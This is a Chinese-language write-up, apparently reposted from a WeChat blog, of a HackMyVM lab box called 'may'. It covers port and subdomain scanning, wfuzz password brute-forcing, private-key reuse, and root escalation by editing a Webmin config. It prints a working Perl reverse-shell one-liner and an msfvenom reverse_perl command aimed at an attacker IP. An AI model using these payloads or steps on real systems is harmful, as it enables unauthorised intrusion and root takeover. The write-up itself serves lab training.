渗透实战模拟
靶场介绍
|
may |
medim |
子域名扫描、后台爆破、wfuzz 爆破、cookie 注入、id_rsa 私钥利用、perl 反弹shell、webmin利用 |
信息收集
主机发现
端口扫描
└─# nmap -sV -A -p- -T4 192.168.31.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-13 10:10 EST
Nmap scan report for may (192.168.31.102)
Host is up (0.00075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 94:fb:c0:76:f2:b3:ff:4a:ed:61:6a:ae:a1:ca:86:c1 (RSA)
| 256 d0:29:99:fd:69:68:21:e3:b4:a6:48:e4:4e:a1:7e:f4 (ECDSA)
|_ 256 2a:1b:1f:3d:ab:0a:00:5b:43:75:89:67:8a:98:21:df (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Did not follow redirect to http://may.hmv
|_http-server-header: nginx/1.14.2
10000/tcp open http MiniServ 1.979 (Webmin httpd)
|_http-server-header: MiniServ/1.979
|_http-title: 200 — Document follows
MAC Address: 08:00:27:2D:3D:2E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.75 ms may (192.168.31.102)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.73 seconds
目录扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://may.hmv -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://may.hmv
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://may.hmv/index.html (Status: 200) [Size: 194]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
需要配置域名
上面的提示,估计就是10000端口这个webmin,但是没有密码
默认密码登录失败
子域名扫描
ffuf -r -c -ic -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "HOST: FUZZ.may.hmv" -u 'http://192.168.31.102' -fs 194
对子域名目录进行扫描
使用wfuzz 爆破出密码为rebelde
wfuzz -z file,/usr/share/wordlists/rockyou.txt -d "user=marie&password=FUZZ" --hh 20 http://portal.may.hmv/check.php
使用同样的账号密码登录ssh.may.hwv 失败,尝试使用cookie,发现访问成功获取到了id_rsa 私钥
权限获取
使用ssh私钥登录成功获取flag
权限提升
这里查看到webmin 是以root 权限运行的,webmin 目录进不去,但是配置文件我们可以看到和编辑,那么我们可以尝试篡改配置文件的加载程序。
这里我们篡改配置文件路径为/tmp/failed.pl ,然后再里面添加perl 反弹shell 的代码
#!/usr/bin/perl
use Socket;$i="192.168.31.11";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
open(CONF, "</etc/webmin/miniserv.conf") || die "Failed to open /etc/webmin/miniserv.conf : $!";
while(<CONF>) {
$root = $1 if (/^root=(.*)/);
}
close(CONF);
$root || die "No root= line found in /etc/webmin/miniserv.conf";
$ENV{'PERLLIB'} = "$root";
$ENV{'WEBMIN_CONFIG'} = "/etc/webmin";
$ENV{'WEBMIN_VAR'} = "/var/webmin";
delete($ENV{'MINISERV_CONFIG'});
chdir("$root");
exec("$root/record-failed.pl", @ARGV) || die "Failed to run $root/record-failed.pl : $!";
执行后并没有反弹shell,可能是需要重启服务才能生效,使用sudo 重启系统
尴尬!文件放在tmp 下重启后没了。重新放在/home/maire目录下
重启后,随便输入一个账号,反弹shell 成功
我们也可以利用另外一种方式反弹shell, 使用msfvenom 生成一个pl 马。同样可以反弹shell.
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.31.11 LPORT=4444 -f raw > shell.pl
补充
进去系统后,查看webmin 用户,重置root 账号密码
webmin 系统里面是内置shell 的,如果实战中获取到登录的账号密码,那么就获取到对应权限了。
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【靶场实战】从私钥利用到Webmin提权
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论